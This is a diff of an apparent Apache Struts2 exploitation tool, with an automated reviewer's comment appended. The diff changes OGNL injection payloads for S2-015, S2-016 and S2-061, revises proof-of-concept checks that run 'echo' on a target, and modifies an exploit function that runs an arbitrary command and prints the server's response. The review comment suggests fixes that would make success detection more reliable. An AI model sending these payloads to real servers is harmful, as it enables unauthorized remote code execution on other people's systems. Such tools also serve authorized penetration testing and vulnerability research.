|
1 | 1 | #!/usr/bin/env python3 |
2 | 2 | # -*- coding: utf-8 -*- |
| 3 | +import re |
3 | 4 | import http.client |
4 | 5 | import base64 |
5 | 6 | from thirdparty import requests |
@@ -59,7 +60,7 @@ def __init__(self, url): |
59 | 60 | 'ing(%23d))%2C%23out.close()%7D' |
60 | 61 | self.payload_s2_015 = r"/${%23context['xwork.MethodAccessor.denyMethodExecution']=false,%23f=%23_memberAcces" \ |
61 | 62 | r"s.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberA" \ |
62 | | - r"ccess, true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInp" \ |
| 63 | + r"ccess, true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('RECOMMAND').getInp" \ |
63 | 64 | r"utStream())}.action" |
64 | 65 | self.payload_s2_016_1 = r"?redirect:${%23req%3d%23context.get(%27co%27" \ |
65 | 66 | r"%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atc" \ |
@@ -423,7 +424,7 @@ def s2_016_poc(self): |
423 | 424 | if md in misinformation(self.req.text, md): |
424 | 425 | self.vul_info["vul_data"] = dump.dump_all(self.req).decode('utf-8', 'ignore') |
425 | 426 | self.vul_info["prt_resu"] = "PoCSuCCeSS" |
426 | | - self.vul_info["vul_payd"] = self.payload |
| 427 | + self.vul_info["vul_payd"] = self.payload_1 |
427 | 428 | self.vul_info["prt_info"] = "[rce] [cmd: " + cmd + "]" |
428 | 429 | verify.scan_print(self.vul_info) |
429 | 430 | except requests.exceptions.Timeout: |
@@ -799,18 +800,19 @@ def s2_061_poc(self): |
799 | 800 | " may lead to remote code execution." |
800 | 801 | self.vul_info["cre_date"] = "2021-01-30" |
801 | 802 | self.vul_info["cre_auth"] = "zhzyker" |
802 | | - md = dns_request() |
803 | | - cmd = "ping " + md |
| 803 | + md = random_md5() |
| 804 | + cmd = "echo " + md |
804 | 805 | self.payload = self.payload_s2_061.replace("RECOMMAND", cmd) |
805 | 806 | if r"?" not in self.url: |
806 | | - self.url_061 = self.url + "?id=" |
| 807 | + self.url_061 = self.url + "/?id=" |
807 | 808 | try: |
808 | 809 | self.req = requests.get(self.url_061 + self.payload, headers=self.headers, timeout=self.timeout, verify=False) |
809 | | - if dns_result(md): |
| 810 | + req = re.findall(r'<a id="(.*)', self.req.text)[0] |
| 811 | + if misinformation(req, md): |
810 | 812 | self.vul_info["vul_data"] = dump.dump_all(self.req).decode('utf-8', 'ignore') |
811 | 813 | self.vul_info["prt_resu"] = "PoCSuCCeSS" |
812 | 814 | self.vul_info["vul_payd"] = self.payload |
813 | | - self.vul_info["prt_info"] = "[dns] [cmd: " + cmd + "]" |
| 815 | + self.vul_info["prt_info"] = "[rce] [cmd: " + cmd + "]" |
814 | 816 | verify.scan_print(self.vul_info) |
815 | 817 | except requests.exceptions.Timeout: |
816 | 818 | verify.timeout_print(self.vul_info["prt_name"]) |
@@ -1082,12 +1084,11 @@ def s2_061_exp(self, cmd): |
1082 | 1084 | vul_name = "Apache Struts2: S2-061" |
1083 | 1085 | self.payload = self.payload_s2_061.replace("RECOMMAND", cmd) |
1084 | 1086 | if r"?" not in self.url: |
1085 | | - self.url_061 = self.url + "?id=" |
| 1087 | + self.url_061 = self.url + "/?id=" |
1086 | 1088 | try: |
1087 | 1089 | self.req = requests.get(self.url_061 + self.payload, headers=self.headers, timeout=self.timeout, verify=False) |
1088 | | - r = "Command Executed Successfully (But No Echo)" |
1089 | 1090 | self.raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore') |
1090 | | - verify.exploit_print(r, self.raw_data) |
| 1091 | + verify.exploit_print(self.req.text, self.raw_data) |
1091 | 1092 | except requests.exceptions.Timeout: |
1092 | 1093 | verify.timeout_print(vul_name) |
1093 | 1094 | except requests.exceptions.ConnectionError: |
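Review bot: In s2_061_poc the new `re.findall(r'<a id="(.*)', self.req.text)[0]` raises IndexError on any response that has no `<a id="` tag, and the only handlers visible below it catch requests Timeout/ConnectionError, so a non-vulnerable or differently-templated target aborts the scan instead of being reported as a miss. That line then feeds the captured text to `misinformation(req, md)` and uses the return value as a boolean, whereas the s2_016 hunk tests `md in misinformation(self.req.text, md)`; if the helper returns text, a non-empty string is always truthy and this check would report success whenever the tag is present at all. Suggest `match = re.search(r'<a id="(.*)', self.req.text)` followed by `if match and md in misinformation(match.group(1), md):`, so both the missing-tag and the wrong-echo cases fall through quietly. The `self.url + "/?id="` change in both s2_061 methods yields `//?id=` when the URL already ends in a slash, which some servers normalize and others reject — worth confirming against the URL handling in `__init__`, which is outside these hunks. The definition lines of s2_061_poc and s2_061_exp lie above their hunks.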
|